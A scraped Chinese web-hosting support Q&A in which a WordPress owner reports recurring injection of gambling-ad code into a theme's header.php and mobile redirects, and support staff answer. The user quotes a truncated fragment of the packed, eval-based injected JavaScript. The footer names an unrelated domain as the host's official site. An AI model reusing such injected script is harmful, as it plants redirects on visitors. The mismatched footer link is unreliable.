問：后臺提示被掛馬，內(nèi)容如下（對應(yīng)的文件是/2162.html/index.html.bak）： 03:37:59)網(wǎng)站因存在木馬（特征: 熱血傳奇，路徑：wp-content/cache/supercache/www.tvtv.hk/archives/2162.html/index.html5月1日左右也有類似提示，發(fā)現(xiàn)/www/wp-content/themes/minty/header.php被加入代碼（葡京在線的廣告，見文末），刪除后將所有/minty/目錄下的文件全部設(shè)置為只讀。今天又提示被掛馬，雖然header.php沒有被修改，但我知道木馬肯定沒清理干凈。前幾天，我還將數(shù)據(jù)庫和根目錄下所有文件復(fù)制到一個新的云主機(jī)下，更換域名（www.qupc.net），目錄可讀可寫，關(guān)閉WP Super Cache緩存插件，發(fā)現(xiàn)過了幾天header.php自動被寫入上次一樣的代碼。除了文件頭被修改，用手機(jī)瀏覽網(wǎng)站，有時會自動跳轉(zhuǎn)到廣告網(wǎng)站，而且只有第一次瀏覽會跳轉(zhuǎn)，然后過幾天才能再跳轉(zhuǎn)，試了電信、移動都是如此，換手機(jī)也是一樣。（網(wǎng)址沒記，好像每次都不一樣）。
< type=\”text/javascript\”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\”\”:e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!\’\’.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){r

答：您好，
??1、wp-content/cache/supercache/www.tvtv.hk/archives/2162.html/index.html  不是掛馬文件，您網(wǎng)頁內(nèi)容含有關(guān)鍵詞“熱血傳奇”，請您修改下關(guān)鍵詞。
??2、我司通過工具掃描和分析近期訪問日志，沒有發(fā)現(xiàn)掛馬文件。通過文件管理只設(shè)置了www只讀，www下目錄沒有設(shè)置只讀，建議您設(shè)置不需要修改文件只讀。
3、如再次出現(xiàn)掛馬修改文件，請暫時不要恢復(fù)修改文件，我司需要通過修改時間點(diǎn)日志分析排查，非常感謝您長期對我司的支持!

問：這么說熱血傳奇是誤報了，可是被篡改為什么查不出？我換了服務(wù)器都沒用，太不尋常了吧截圖為header.php第一次被篡改的時間：2018?年?5?月?1?日，??23:24:36。之后我將header.php設(shè)為只讀，雖然沒有再被篡改，但是今天的百度搜索依然出現(xiàn)了異常。而且換服務(wù)器換域名后，header.php一旦改回可讀可寫，還是會被篡改，可見還是有問題的。

問：補(bǔ)充一點(diǎn)，對比了一下FTP和后臺管理器的時間，發(fā)現(xiàn)相差8小時，我本地保留的header.php是從FTP下載的，顯示的也是FTP時間，那么header.php真正的修改時間應(yīng)該是5月1日15：24：36

答：您好，
1、對應(yīng)時間日志中查看，通過您網(wǎng)站后臺編輯過文件，請核實(shí)是不是您當(dāng)時操作過。如果不是，建議您修改后臺密碼和后臺路徑再觀察。
2、百度快照并沒有更新，請訪問http://help.baidu.com/newadd?prod_id=1&category=1&link=http%3A%2F%2Fcache.baiducontent.com%2Fc%3Fm%3D9d78d513d9d430dc4f9b93697c65cba6d0020ea78449e3732b415011e8aca7d13b275fa0131aacbe3df2de8d9f4aaafdd66e6b9f27432a459bf4%26p%3D876ad415d9c041a90cb08c2d0214bb%26newp%3D92769a479e9d33ee44bd9b7d0ddb2151d4db1e6b82c825d7331b001c3bbfbd6c37b6603a4485debf13ca3dda5c91d9fb4c57479c%26user%3Dbaidu%26fm%3Dsc%26query%3D%25CA%25D5%25CA%25D3%25C2%25CA%25B2%25E9%25D1%25AF%26qid%3De100a6c70000c0d5%26p1%3D6 投訴更新快照，非常感謝您長期對我司的支持!

西部數(shù)碼（west.cn）是經(jīng)工信部、ICANN、CNNIC認(rèn)證審批，持有ISP、云牌照、IDC、CDN、頂級域名注冊商等全業(yè)務(wù)資質(zhì)的正規(guī)老牌服務(wù)商，自成立至今20余年專注于域名注冊、虛擬主機(jī)、云服務(wù)器、企業(yè)郵箱、企業(yè)建站等互聯(lián)網(wǎng)基礎(chǔ)服務(wù)！

截止目前，已經(jīng)為超過2000萬個域名提供了注冊、解析等服務(wù)，是中國五星級域名注冊注冊商！已為超過50萬個網(wǎng)站提供了高速穩(wěn)定的云托管服務(wù)，獲評中國最受用戶喜歡云主機(jī)服務(wù)商。

西部數(shù)碼提供全方位7X24H專業(yè)售后支撐，域名注冊特價1元起，高速穩(wěn)定云主機(jī)45元起，更多詳情請瀏覽西部數(shù)碼官網(wǎng)：http://youyuetrip.com/





猜你還會喜歡下面的內(nèi)容

• 網(wǎng)站為什么打開正常，百度跳轉(zhuǎn)成非正規(guī)網(wǎng)站
• 你好，網(wǎng)站開通一下MP4的流媒體播放功能
• MySQL 外網(wǎng)地址無法訪問
• 登錄顯示不出來驗(yàn)證碼-虛擬主機(jī)/數(shù)據(jù)庫問題
• 顯示連接數(shù)據(jù)庫失敗是什么原因
• dfcmotor168 的虛擬主機(jī)請刪除備案碼
• FTP賬號：里面的文件誤刪了還能恢復(fù)嗎
• 新開的主機(jī)，怎么顯示空間已經(jīng)占滿了？
• 云數(shù)據(jù)庫 訪問很慢-虛擬主機(jī)/數(shù)據(jù)庫問題
• 無法正常php程序-虛擬主機(jī)/數(shù)據(jù)庫問題
• mssql數(shù)據(jù)庫鏈接問題
• gdztgc.com這個站是綁定哪個主機(jī)？
• 香港體驗(yàn)主機(jī)網(wǎng)站程序已經(jīng)上傳
• 怎么發(fā)短信說沒有解析你們服務(wù)器是什么問題。
• 上傳網(wǎng)站文件失敗-虛擬主機(jī)/數(shù)據(jù)庫問題
• dghaifa服務(wù)器設(shè)置了index.html為首頁，還是打

熱門標(biāo)簽

其他問題云服務(wù)器問題域名及賬戶問題企業(yè)郵局市場咨詢云服務(wù)器云建站/云站群/小程序虛擬主機(jī)網(wǎng)絡(luò)知識企業(yè)郵箱域名注冊域名備案域名商標(biāo)注冊云主機(jī)更多標(biāo)簽...

大家感興趣的內(nèi)容